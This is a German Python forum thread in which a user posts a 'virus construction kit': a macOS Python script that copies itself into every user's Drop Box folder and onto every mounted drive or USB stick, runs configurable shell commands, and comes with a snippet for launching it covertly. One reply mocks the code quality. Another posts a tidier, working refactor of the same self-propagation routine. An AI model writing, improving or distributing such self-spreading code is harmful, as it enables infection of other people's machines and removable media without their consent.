Virus Baukasten

Stellt hier eure Projekte vor.
Internetseiten, Skripte, und alles andere bzgl. Python.
Antworten
Benutzeravatar
TutorialMichel
User
Beiträge: 10
Registriert: Samstag 4. Juni 2016, 15:08

Nerv mich bitte nicht, weil es "schlecht" oder so... :oops:
Also hier der Code:

Code: Alles auswählen

import subprocess, time, os
# Virus Baukasten Automatische Version
# Virus kopiert sich in den Briefkasten von allen Benutzern und
# in die Eingelegten Festplatten/USB Sticks/usw...
#
# Coded by: TutorialMichel
#
# Befehle:
virus = 'NAME' # Name der Datei
message1 = 'NACHRICHT1' # Gesagte Nachricht
message2 = 'NACHRICHT2' # Gesagte Nachricht
befehl1 = 'BEFEHL1' # Befehl der aus gefuehr wird(Terminal Befehl!)
befehl2 = 'BEFEHL2' # Befehl der aus gefuehr wird(Terminal Befehl!)
# All diese Befehle werden nach der Kopierung ausgefuehrt!
# Damit der Virus sich ausbreitet!
# Den Rest bitte nicht aender!
hierbinich = os.path.abspath('.tmp') # Path des Virus
subprocess.call(['cd /Users/; ls > ' + str(hierbinich)],shell=True) # Benutzer werden in die Datei geschrieben!
lesen = open('.tmp', 'r') # Datei wird geoeffnet!
while(1): # Eine while Schleife
    lesen_ = lesen.readline() # Zeile wird geoeffnet
    if lesen_ == '': # Detecten von Datei Ende
        break # while Schleife wird beendet
    lesen__ = lesen_.strip('\n') # Zeilenumbruch wird entfernt
    if lesen__ != 'Shared': # Ausschliesung des Oeffentlichen Benutzers
        subprocess.call(['cp ' + str(virus) + ' /Users/' + str(lesen__) + '/Public/Drop\ Box/' + str(virus)],shell=True) # Virus wird kopiert
subprocess.call(['cd /Volumes/; ls > ' + str(hierbinich)],shell=True) # Festplatten/USB Sticks/usw. werden in eine Datei geschrieben
lesen.close() # Datei wird geschlossen
lesen = open('.tmp', 'r') # Datei wird geoeffnet
while(1): # Eine while Schleife
    lesen_ = lesen.readline() # Zeile wird gelesen
    if lesen_ == '': # Detecten von Datei Ende
        break # while Schleife wird beendet
    lesen__ = lesen_.strip('\n') # Zeilenumbruch wird entfernt
    if lesen__ != 'Macintosh HD': # Ausschliessung davon das sich das Syste... ach egal
        subprocess.call(['cp ' + str(virus) + ' /Volumes/' + str(lesen__) + '/' + str(virus)],shell=True) # Virus wird kopiert
subprocess.call(['say Virus ' + str(virus) + ' ist an!'],shell=True) # Nachricht
subprocess.call(['' + str(befehl1)],shell=True) # Nachricht
subprocess.call(['' + str(befehl2)],shell=True) # Nachricht
subprocess.call(['say ' + str(message1)],shell=True) # Nachricht
subprocess.call(['say ' + str(message2)],shell=True) # Nachricht
Um den Virus "heimlich zu starten" könnt ihr den Virus von einen anderen Programm starten...
hier der code dafür

Code: Alles auswählen

import subprocess
subprocess.call(['python VIRUSNAME'],shell=True)
Und Fertig ist der Virus
und keine "Besser" wisser :)
LG. TutorialMichel
Zuletzt geändert von Anonymous am Sonntag 12. Juni 2016, 13:27, insgesamt 1-mal geändert.
Grund: Quelltext in Python-Codebox-Tags gesetzt.
₪฿௹₥₪ ฿௹₥₪ ฿௹₥₪฿௹₥₪฿ ௹₥₪฿ ௹₥₪฿௹₥₪฿ ௹₥ ₪฿௹₥₪฿௹₥ ₪฿௹₥ ₪฿௹₥ ₪฿௹₥₪฿௹ ₥₪฿௹₥₪ ฿௹₥₪฿௹ ₥₪฿௹₥₪ ฿௹₥₪฿௹₥₪฿௹₥₪ ฿௹₥₪฿௹ ₥₪฿௹₥₪฿ ௹₥₪฿௹ ₥₪ ฿௹₥₪ ฿௹₥₪฿௹₥₪ ฿ ௹₥₪฿ ௹₥₪฿௹₥₪฿௹₥ ₪฿௹₥₪฿௹₥ ₪฿௹₥₪฿௹₥ ₪฿௹₥₪฿௹ ₥₪฿௹₥₪ ฿௹₥₪฿௹ ₥₪฿ ௹₥₪ ฿௹₥₪฿௹₥₪฿௹₥₪฿௹₥ ₪฿௹ ₥₪฿௹₥₪฿ ௹₥
BlackJack

@TutorialMichel: Warum veröffentlichst Du hier dermassen schlechten Python-Code? Du möchtest nicht genervt werden, nervst aber uns mit diesem unsinnigen, grottenschlechten ”Python-Code”‽ Wenn Du keine Rückmeldung haben willst, weil Du bereits weisst, dass es schlechter Code ist, dann ist ein Diskussionsforum der falsche Ort. Leg Dir ein Blog zu und schalte eventuell die Kommentarfunktion aus.
Sirius3
User
Beiträge: 17711
Registriert: Sonntag 21. Oktober 2012, 17:20

@TutorialMichel: was an Deinen Codes so schlecht ist, habe ich ja schon im anderen Thread geschrieben. Den Effekt sieht man ja hier. Vielleicht lernst Du ja am Beispiel mehr:

Code: Alles auswählen

import subprocess
import os
import shutil
# Virus Baukasten Automatische Version
# Virus kopiert sich in den Briefkasten von allen Benutzern und
# in die Eingelegten Festplatten/USB Sticks/usw...

VIRUS = 'Virus'
MESSAGES = ['NACHRICHT1', 'NACHRICHT2'] # Gesagte Nachricht
COMMANDS = [['BEFEHL1'], ['BEFEHL2']] # Befehl der aus gefuehr wird(Terminal Befehl!)

def copy_me():
    for dirname in os.listdir('/Users'):
        if dirname != 'Shared':
            # Ausschliesung des Oeffentlichen Benutzers
            shutil.copyfile(__file__, os.path.join('/Users', dirname, 'Public', 'Drop Box', os.path.basename(__file__)))
    for dirname in os.listdir('/Volumes'):
        if dirname != 'Macintosh HD':
            # Ausschliesung der lokalen Platte
            shutil.copyfile(__file__, os.path.join('/Volumes', dirname, os.path.basename(__file__)))

def main():
    copy_me()
    subprocess.call(['say', VIRUS, 'ist an!'])
    for command in COMMANDS:
        subprocess.call(command)
    for message in MESSAGES:
        subprocess.call(['say', message])

if __name__ == '__main__':
    main()
Antworten